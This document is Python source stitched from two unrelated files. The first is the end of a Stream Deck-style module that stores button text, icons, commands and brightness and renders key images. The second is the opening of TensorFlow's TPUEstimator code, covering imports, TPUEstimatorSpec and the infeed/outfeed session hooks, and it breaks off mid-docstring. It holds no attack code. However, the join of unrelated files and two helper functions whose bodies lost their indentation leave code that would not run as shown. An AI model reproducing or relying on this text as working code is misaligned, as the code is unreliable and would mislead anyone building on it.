def get_button_text(deck_id: str, page: int, button: int) -> str:
    """Return the text configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("text", "")
def set_button_icon(deck_id: str, page: int, button: int, icon: str) -> None:
    """Store the icon path for a button, invalidate its image, and redraw."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["icon"] = icon
    # The cached image no longer matches the new icon.
    image_cache.pop(f"{deck_id}.{page}.{button}", None)
    render()
    _save_state()


def get_button_icon(deck_id: str, page: int, button: int) -> str:
    """Return the icon path configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("icon", "")
def set_button_info(deck_id: str, page: int, button: int, info: str) -> None:
    """Store live 'information' text for a button and redraw it.

    Information takes display priority over regular text (see
    _render_key_image).
    """
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["information"] = info
    image_cache.pop(f"{deck_id}.{page}.{button}", None)
    render()
    _save_state()


def get_button_info(deck_id: str, page: int, button: int) -> str:
    """Return the 'information' text configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("information", "")
def set_button_change_brightness(deck_id: str, page: int, button: int, amount: int) -> None:
    """Configure a button to change deck brightness by *amount* when pressed."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["brightness_change"] = amount
    render()
    _save_state()


def get_button_change_brightness(deck_id: str, page: int, button: int) -> int:
    """Return the brightness delta configured for a button (0 when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("brightness_change", 0)
def set_button_command(deck_id: str, page: int, button: int, command: str) -> None:
    """Store the shell command a button should launch when pressed."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["command"] = command
    _save_state()


def get_button_command(deck_id: str, page: int, button: int) -> str:
    """Return the command configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
    """Store the (1-based) page a button should switch to when pressed."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["switch_page"] = switch_page
    _save_state()


def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
    """Returns the page switch set for the specified button. 0 implies no page switch."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("switch_page", 0)
def set_button_information_index(deck_id: str, page: int, button: int, info_index: int) -> None:
    """Store the 'Information' dropdown index selected for a button."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["information_index"] = info_index
    _save_state()


def get_button_information_index(deck_id: str, page: int, button: int) -> int:
    """Return the 'Information' dropdown index for a button (0 when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("information_index", 0)
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
    """Store the key-combo string a button should emit when pressed."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["keys"] = keys
    _save_state()


def get_button_keys(deck_id: str, page: int, button: int) -> str:
    """Return the key-combo string configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
    """Store the text a button should type out when pressed."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["write"] = write
    _save_state()


def get_button_write(deck_id: str, page: int, button: int) -> str:
    """Return the typed-text payload configured for a button ('' when unset)."""
    button_cfg = _button_state(deck_id, page, button)
    return button_cfg.get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
    """Apply *brightness* to the deck hardware and remember it in state."""
    decks[deck_id].set_brightness(brightness)
    deck_state = state.setdefault(deck_id, {})
    deck_state["brightness"] = brightness
    _save_state()


def get_brightness(deck_id: str) -> int:
    """Return the stored brightness for a deck (100 when unset)."""
    deck_state = state.get(deck_id, {})
    return deck_state.get("brightness", 100)  # type: ignore


def change_brightness(deck_id: str, amount: int = 1) -> None:
    """Change the brightness of the deck by the specified amount"""
    # Clamp the result into the valid 0..100 range.
    clamped = max(min(get_brightness(deck_id) + amount, 100), 0)
    set_brightness(deck_id, clamped)
def get_page(deck_id: str) -> int:
    """Return the page currently shown on the deck (0 when unset)."""
    deck_state = state.get(deck_id, {})
    return deck_state.get("page", 0)  # type: ignore


def set_page(deck_id: str, page: int) -> None:
    """Switch the deck to *page*, redraw it, and persist the selection."""
    deck_state = state.setdefault(deck_id, {})
    deck_state["page"] = page
    render()
    _save_state()
def render() -> None:
    """renders all decks"""
    for deck_id, deck_state in state.items():
        deck = decks.get(deck_id, None)
        if not deck:
            # State can reference decks that are not currently attached.
            warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
            continue
        page = get_page(deck_id)
        for button_id, button_settings in (
            deck_state.get("buttons", {}).get(page, {}).items()  # type: ignore
        ):
            # Rendered key images are cached; the setters invalidate entries
            # whenever text/icon/information changes.
            key = f"{deck_id}.{page}.{button_id}"
            if key in image_cache:
                image = image_cache[key]
            else:
                image = _render_key_image(deck, **button_settings)
                image_cache[key] = image
            try:
                deck.set_key_image(button_id, image)
            except IndexError:
                # Config refers to a button index this deck model lacks.
                pass
def _render_key_image(deck, icon: str = "", text: str = "", information: str = "", font: str = DEFAULT_FONT, **kwargs):
    """Renders an individual key image"""
    text = str(text)
    image = ImageHelpers.PILHelper.create_image(deck)
    draw = ImageDraw.Draw(image)
    # Optional per-button font size (e.g. live hour/minute buttons use 48);
    # falls back to 14.
    font_size = kwargs.get("font_size") if kwargs.get("font_size") else 14
    # Give information priority over text
    if information:
        text = str(information)
    if icon:
        rgba_icon = Image.open(icon).convert("RGBA")
    else:
        # Transparent placeholder so the thumbnail/paste path stays uniform.
        rgba_icon = Image.new("RGBA", (300, 300))
    icon_width, icon_height = image.width, image.height
    if text:
        # Reserve a 20px strip at the bottom of the key for the label.
        icon_height -= 20
    rgba_icon.thumbnail((icon_width, icon_height), Image.LANCZOS)
    icon_pos = ((image.width - rgba_icon.width) // 2, 0)
    image.paste(rgba_icon, icon_pos, rgba_icon)
    if text:
        true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), font_size)
        # NOTE(review): ImageDraw.textsize was removed in Pillow 10 (use
        # textbbox instead) — confirm the project's pinned Pillow version
        # before upgrading.
        label_w, label_h = draw.textsize(text, font=true_font)
        if icon:
            # With an icon, the label sits in the reserved bottom strip.
            label_pos = ((image.width - label_w) // 2, image.height - 20)
        else:
            label_pos = ((image.width - label_w) // 2, ((image.height - label_h) // 2))
        draw.text(label_pos, text=text, font=true_font, fill="white")
    return ImageHelpers.PILHelper.to_native_format(deck, image)
# On import, load any previously saved configuration so the UI state
# survives restarts; a missing state file simply means a fresh start.
if os.path.isfile(STATE_FILE):
    _open_config(STATE_FILE)
|
tpu_estimator.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
# Placeholder loss reported before any real loss value is available.
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
# Register proto (de)serialization for the iterations_per_loop variable
# exactly once, so it can round-trip through MetaGraphDef like other
# resource variables.
if ops.get_to_proto_function(
    '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
  ops.register_proto_function(
      '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
      proto_type=variable_pb2.VariableDef,
      to_proto=resource_variable_ops._to_proto_fn,  # pylint: disable=protected-access
      from_proto=resource_variable_ops._from_proto_fn)  # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
  """Control-flow context that rejects summary ops inside TPU host_calls."""

  def AddOp(self, op):
    # These legacy tf.summary ops cannot run under XLA compilation; host
    # calls must use the tf.contrib.summary equivalents instead.
    if op.type in [
        'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
        'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
    ]:
      raise ValueError('Please use tf.contrib.summary instead of tf.summary '
                       'inside of host_calls.')
def _create_global_step(graph):
  """Creates the global-step resource variable in *graph*.

  Args:
    graph: Graph to create the variable in; defaults to the default graph.

  Returns:
    The newly created int64 global-step variable.

  Raises:
    ValueError: If a global step variable already exists in *graph*.
  """
  graph = graph or ops.get_default_graph()
  if training.get_global_step(graph) is not None:
    raise ValueError('"global_step" already exists.')
  # Create in proper graph and base name_scope.
  with graph.as_default() as g, g.name_scope(None):
    return variable_scope.get_variable(
        ops.GraphKeys.GLOBAL_STEP,
        shape=[],
        dtype=dtypes.int64,
        initializer=init_ops.zeros_initializer(),
        trainable=False,
        use_resource=True,
        collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
  """Creates or gets the iterations_per_loop variable.

  In TPUEstimator, the user provided computation, the model_fn, is wrapped
  inside a tf.while_loop for peak performance. The iterations of the loop are
  specified by this variable, which adjusts its value on the CPU after each TPU
  program execution and before the next TPU execution.

  The purpose of using a variable, rather then a constant, is to allow
  TPUEstimator adapt the TPU training iterations according to the final steps
  specified by users. For example, if the user sets the iterations_per_loop as 4
  in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
  variable will have the following value before each TPU training.

      - 1-th TPU execution: iterations_per_loop = 4
      - 2-th TPU execution: iterations_per_loop = 4
      - 3-th TPU execution: iterations_per_loop = 2

  As model_fn increases the global step once per train_op invocation, the global
  step is 10 after all TPU executions, matching the steps=10 inputs passed in by
  users.

  Returns:
    A TF non-trainable resource variable.

  Raises:
    RuntimeError: If multi iterations_per_loop variables were found.
  """
  graph = ops.get_default_graph()
  collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
  # The dedicated collection acts as a singleton registry for this variable.
  iter_vars = graph.get_collection(collection_name)
  if len(iter_vars) == 1:
    return iter_vars[0]
  elif len(iter_vars) > 1:
    raise RuntimeError('Multiple iterations_per_loop_var in collection.')
  # Colocate with the global step so both live on the same device.
  with ops.colocate_with(training_util.get_global_step()):
    with variable_scope.variable_scope(
        _TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
      return variable_scope.get_variable(
          _ITERATIONS_PER_LOOP_VAR,
          initializer=init_ops.zeros_initializer(),
          shape=[],
          dtype=dtypes.int32,
          trainable=False,
          collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
          use_resource=True)
def _sync_variables_ops(ctx):
  """Create variables synchronization ops.

  Gets the variables back from TPU nodes. This means the variables updated
  by TPU will now be *synced* to host memory.
  In BROADCAST mode, we skip this sync since the variables are usually too
  big to transmit via RPC.

  Args:
    ctx: A `_InternalTPUContext` instance with mode.

  Returns:
    A list of sync ops.
  """
  if not ctx.is_input_broadcast_with_iterators():
    # check_numerics forces a read of each trainable variable onto the host,
    # which is what performs the sync; the NaN check is a useful side effect.
    return [
        array_ops.check_numerics(v.read_value(),
                                 'Gradient for %s is NaN' % v.name).op
        for v in variables.trainable_variables()
    ]
  else:
    return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
  """Returns an op to increase the eval step for TPU evaluation.

  Args:
    iterations_per_loop: Tensor. The number of eval steps running in TPU system
      before returning to CPU host for each `Session.run`.

  Returns:
    An operation
  """
  eval_step = evaluation._get_or_create_eval_step()  # pylint: disable=protected-access
  # Estimator evaluate increases 1 by default. So, we increase the difference.
  return state_ops.assign_add(
      eval_step,
      math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
      use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
  """Rate-limits info logging to at most one message per configured interval."""

  def __init__(self, seconds):
    self._log_every_n_seconds = seconds
    self._last_log_time = 0

  def log(self, msg, *args, **kw):
    """Emits *msg* via logging.info only if the interval has elapsed."""
    now = time.time()
    if now - self._last_log_time > self._log_every_n_seconds:
      self._last_log_time = now
      logging.info(msg, *args, **kw)
class _SIGNAL(object):
  """Signal used to control the thread of infeed/outfeed.

  All preserved signals must be negative numbers. Positive numbers are used to
  indicate the number of iterations for next training/evaluation loop.
  """
  # Sentinels consumed by _OpQueueContext.read_iteration_counts().
  NEXT_BATCH = -1
  STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec):  # pylint: disable=protected-access
  """Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.

  See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
  `export_outputs`.

  For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
  `metric_fn` runs on CPU to generate metrics and `tensors` represents the
  `Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
  To be precise, TPU evaluation expects a slightly different signature from the
  `tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
  dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
  The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
  `tensors` usually specify the model logits, which are transferred back from
  TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
  size is the first dimension. Once all tensors are available at CPU host from
  all shards, they are concatenated (on CPU) and passed as positional arguments
  to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
  a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
  name to the result of calling a metric function, namely a `(metric_tensor,
  update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
  `eval_metrics`.

  `scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
  function should not capture any Tensors in `model_fn`.

  `host_call` is a tuple of a `function` and a list or dictionary of `tensors`
  to pass to that function and returns a list of Tensors. `host_call` currently
  works for train() and evaluate(). The Tensors returned by the function is
  executed on the CPU on every step, so there is communication overhead when
  sending tensors from TPU to CPU. To reduce the overhead, try reducing the
  size of the tensors. The `tensors` are concatenated along their major (batch)
  dimension, and so must be >= rank 1. The `host_call` is useful for writing
  summaries with `tf.contrib.summary.create_file_writer`.
  """

  def __new__(cls,
              mode,
              predictions=None,
              loss=None,
              train_op=None,
              eval_metrics=None,
              export_outputs=None,
              scaffold_fn=None,
              host_call=None,
              training_hooks=None,
              evaluation_hooks=None,
              prediction_hooks=None):
    """Creates a validated `TPUEstimatorSpec` instance."""
    # eval_metrics and host_call share the same outfeed validation logic.
    host_calls = {}
    if eval_metrics is not None:
      host_calls['eval_metrics'] = eval_metrics
    if host_call is not None:
      host_calls['host_call'] = host_call
    _OutfeedHostCall.validate(host_calls)

    # Normalize hooks to tuples so they can be concatenated later.
    training_hooks = tuple(training_hooks or [])
    evaluation_hooks = tuple(evaluation_hooks or [])
    prediction_hooks = tuple(prediction_hooks or [])
    for hook in training_hooks + evaluation_hooks + prediction_hooks:
      if not isinstance(hook, session_run_hook.SessionRunHook):
        raise TypeError('All hooks must be SessionRunHook instances, given: {}'
                        .format(hook))

    return super(TPUEstimatorSpec, cls).__new__(
        cls,
        mode=mode,
        predictions=predictions,
        loss=loss,
        train_op=train_op,
        eval_metrics=eval_metrics,
        export_outputs=export_outputs,
        scaffold_fn=scaffold_fn,
        host_call=host_call,
        training_hooks=training_hooks,
        evaluation_hooks=evaluation_hooks,
        prediction_hooks=prediction_hooks)

  def as_estimator_spec(self):
    """Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
    host_calls = {}
    if self.eval_metrics is not None:
      host_calls['eval_metrics'] = self.eval_metrics
    if self.host_call is not None:
      host_calls['host_call'] = self.host_call
    # On CPU, host calls become plain graph ops driven by a run hook.
    host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
    eval_metric_ops = None
    if self.eval_metrics is not None:
      eval_metric_ops = host_call_ret['eval_metrics']
    hooks = None
    if self.host_call is not None:
      hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
    loss = self.loss
    # Tensor tracer (when enabled) wraps the loss to record traced tensors.
    if tensor_tracer.TensorTracer.is_enabled() \
       and self.train_op is not None:
      tt = tensor_tracer.TensorTracer()
      loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
    hooks = tuple(hooks or [])
    scaffold = self.scaffold_fn() if self.scaffold_fn else None
    return model_fn_lib.EstimatorSpec(
        mode=self.mode,
        predictions=self.predictions,
        loss=loss,
        train_op=self.train_op,
        eval_metric_ops=eval_metric_ops,
        export_outputs=self.export_outputs,
        scaffold=scaffold,
        training_hooks=self.training_hooks + hooks,
        evaluation_hooks=self.evaluation_hooks + hooks,
        prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
  """Manages work queue and thread for a infeed/outfeed thread."""

  def __init__(self, name, target, args):
    self._name = name
    self._queue = Queue.Queue()
    # The context is prepended so the worker can read its own queue.
    args = (self,) + args
    self._thread = threading.Thread(name=name, target=target, args=args)
    self._thread.daemon = True
    self._thread.start()

  def stop(self):
    # Sentinel that makes read_iteration_counts() return.
    self._queue.put(_SIGNAL.STOP)

  def send_next_batch_signal(self, iterations):
    # Positive values are iteration counts for the next loop.
    self._queue.put(iterations)

  def read_iteration_counts(self):
    # Generator consumed by the worker thread: yields iteration counts
    # until the STOP sentinel arrives.
    while True:
      iterations = self._queue.get(block=True)
      logging.debug('%s read iterations %s', self._name, iterations)
      if iterations == _SIGNAL.STOP:
        logging.info('%s received shutdown signal, stopping.', self._name)
        return
      yield iterations

  def join(self):
    logging.info('Shutting down %s thread.', self._name)
    self.stop()
    self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
  """Work queue/thread controller that forwards only the first signal.

  Used for prediction, where after the first batch signal the worker
  drives itself from the dataset; every subsequent signal is dropped.
  """

  def __init__(self, name, target, args):
    super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
    self._has_signaled = False

  def send_next_batch_signal(self, iterations):
    # Guard clause: only the very first signal is forwarded to the queue.
    if self._has_signaled:
      return
    self._queue.put(iterations)
    self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
  """A Session hook setting up the TPU initialization, infeed, and outfeed.
  This hook does two major things:
  1. initialize and shutdown TPU system.
  2. launch and join the threads for infeed enqueue and (optional) outfeed
  dequeue.
  """
  def __init__(self,
               ctx,
               enqueue_ops,
               dequeue_ops,
               tpu_compile_op,
               run_infeed_loop_on_coordinator=True,
               rendezvous=None,
               master=None,
               session_config=None,
               tpu_init_ops=None,
               outfeed_every_n_steps=1):
    """Constructs the hook.

    Args:
      ctx: Internal TPU context describing the deployment (master job,
        embedding config, TPU config, etc.).
      enqueue_ops: Ops the infeed thread runs to feed data to the TPU.
      dequeue_ops: Ops the outfeed thread runs to drain TPU results.
      tpu_compile_op: Op compiling the TPU program; only run when the
        TPU_SPLIT_COMPILE_AND_EXECUTE environment variable is '1'.
      run_infeed_loop_on_coordinator: If True, the infeed thread runs the
        enqueue ops once per iteration; otherwise once per signal.
      rendezvous: Error rendezvous used to capture infeed/outfeed errors.
      master: Target for the auxiliary session used to initialize the TPU.
      session_config: `ConfigProto` for that auxiliary session.
      tpu_init_ops: Extra ops to run during initialization.
      outfeed_every_n_steps: Dequeue the outfeed only every N steps.
    """
    self._master_job = ctx.master_job
    self._enqueue_ops = enqueue_ops
    self._dequeue_ops = dequeue_ops
    self._rendezvous = rendezvous
    self._master = master
    self._session_config = session_config
    self._init_ops = list(tpu_init_ops or [])
    if ctx.embedding_config is None:
      self._embedding_layer_config = None
    else:
      self._embedding_layer_config = (
          ctx.embedding_config.tpu_embedding.config_proto)
    self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
    self._initial_infeed_sleep_secs = (
        ctx.config.tpu_config.initial_infeed_sleep_secs)
    self._tpu_compile_op = tpu_compile_op
    # When using model parallelism, the TPU is pre-initialized at startup to
    # fetch mesh information. We skip re-initializing it here for
    # MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
    # is causing the variable corruption since the previous allocated memory
    # might be overwritten for other purpose.
    if (ctx.model_parallelism_enabled and
        (ctx.config.tpu_config.per_host_input_for_training is
         tpu_config.InputPipelineConfig.BROADCAST)):
      self._should_initialize_tpu = False
    else:
      self._should_initialize_tpu = True
    self._outfeed_every_n_steps = outfeed_every_n_steps
  def begin(self):
    """Creates iteration and finalize ops before the session is created."""
    logging.info('TPU job name %s', self._master_job)
    self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
    if self._should_initialize_tpu:
      self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
    else:
      self._finalize_ops = []
    summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
    self._init_ops.extend(summary_writer_init_ops)
    # Get all the writer resources from the initializer, so we know what to
    # flush.
    for op in summary_writer_init_ops:
      self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
  def _run_infeed(self, queue_ctx, session):
    """Infeed thread body: enqueues batches as signaled via `queue_ctx`."""
    logging.info('Starting infeed thread controller.')
    if self._initial_infeed_sleep_secs:
      logging.info('Infeed thread sleeping for %d seconds.',
                   self._initial_infeed_sleep_secs)
      time.sleep(self._initial_infeed_sleep_secs)
      logging.info('Infeed thread starting after sleep')
    with self._rendezvous.catch_errors(source='infeed', session=session):
      if self._run_infeed_loop_on_coordinator:
        for count, steps in enumerate(queue_ctx.read_iteration_counts()):
          for i in xrange(steps):
            logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
            session.run(self._enqueue_ops)
      else:
        # The enqueue ops loop on-device; one run per signal suffices.
        for _ in queue_ctx.read_iteration_counts():
          session.run(self._enqueue_ops)
      logging.info('Infeed thread finished, shutting down.')
  def _run_outfeed(self, queue_ctx, session):
    """Outfeed thread body: dequeues results as signaled via `queue_ctx`."""
    logging.info('Starting outfeed thread controller.')
    status_logger = PeriodicLogger(seconds=60)
    with self._rendezvous.catch_errors(source='outfeed', session=session):
      for count, steps in enumerate(queue_ctx.read_iteration_counts()):
        step_counter = 0
        for i in xrange(steps):
          logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
          # Only dequeue every N steps to reduce host-side overhead.
          if step_counter % self._outfeed_every_n_steps == 0:
            session.run(self._dequeue_ops)
          step_counter += 1
        status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
      logging.info('Outfeed thread finished, shutting down.')
  def _create_infeed_controller(self, name, target, args):
    # Overridden by the prediction subclass to signal only once.
    return _OpQueueContext(name=name, target=target, args=args)
  def _assertCompilationSucceeded(self, result, coord):
    """Parses a compilation result proto; stops the coordinator on failure."""
    proto = tpu_compilation_result.CompilationResultProto()
    proto.ParseFromString(result)
    if proto.status_error_message:
      logging.error('Compilation failed: {}'.format(proto.status_error_message))
      coord.request_stop()
    else:
      logging.info('Compilation succeeded')
  def after_create_session(self, session, coord):
    """Initializes the TPU system and launches infeed/outfeed threads."""
    if self._should_initialize_tpu:
      logging.info('Init TPU system')
      start = time.time()
      # TPU initialization runs in a throwaway graph/session so it does not
      # pollute the training graph.
      with ops.Graph().as_default():
        with tf_session.Session(
            self._master, config=self._session_config) as sess:
          sess.run(
              tpu.initialize_system(
                  job=self._master_job,
                  embedding_config=self._embedding_layer_config))
      logging.info('Initialized TPU in %d seconds', time.time() - start)
    session.run(self._init_ops,
                options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
    if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
      logging.info('Compiling user program: this may take a while...')
      self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
    self._infeed_controller = self._create_infeed_controller(
        name='InfeedController', target=self._run_infeed, args=(session,))
    self._outfeed_controller = _OpQueueContext(
        name='OutfeedController', target=self._run_outfeed, args=(session,))
    # Enable the worker watchdog to terminate workers on coordinator exit.
    watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
    if watchdog_timeout > 0:
      session_support.start_worker_watchdog(session,
                                            shutdown_timeout=watchdog_timeout)
  def before_run(self, run_context):
    """Signals both controllers with the next iterations-per-loop count."""
    iterations = run_context.session.run(self._iterations_per_loop_var)
    logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
    self._infeed_controller.send_next_batch_signal(iterations)
    logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
                 iterations)
    self._outfeed_controller.send_next_batch_signal(iterations)
  def end(self, session):
    """Joins worker threads and shuts the TPU system down."""
    logging.info('Stop infeed thread controller')
    self._infeed_controller.join()
    self._rendezvous.record_done('infeed')
    logging.info('Stop output thread controller')
    self._outfeed_controller.join()
    self._rendezvous.record_done('outfeed')
    logging.info('Shutdown TPU system.')
    session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
  """Infeed/outfeed session hook specialized for prediction.

  Prediction drives the infeed from the dataset itself: the infeed loop is
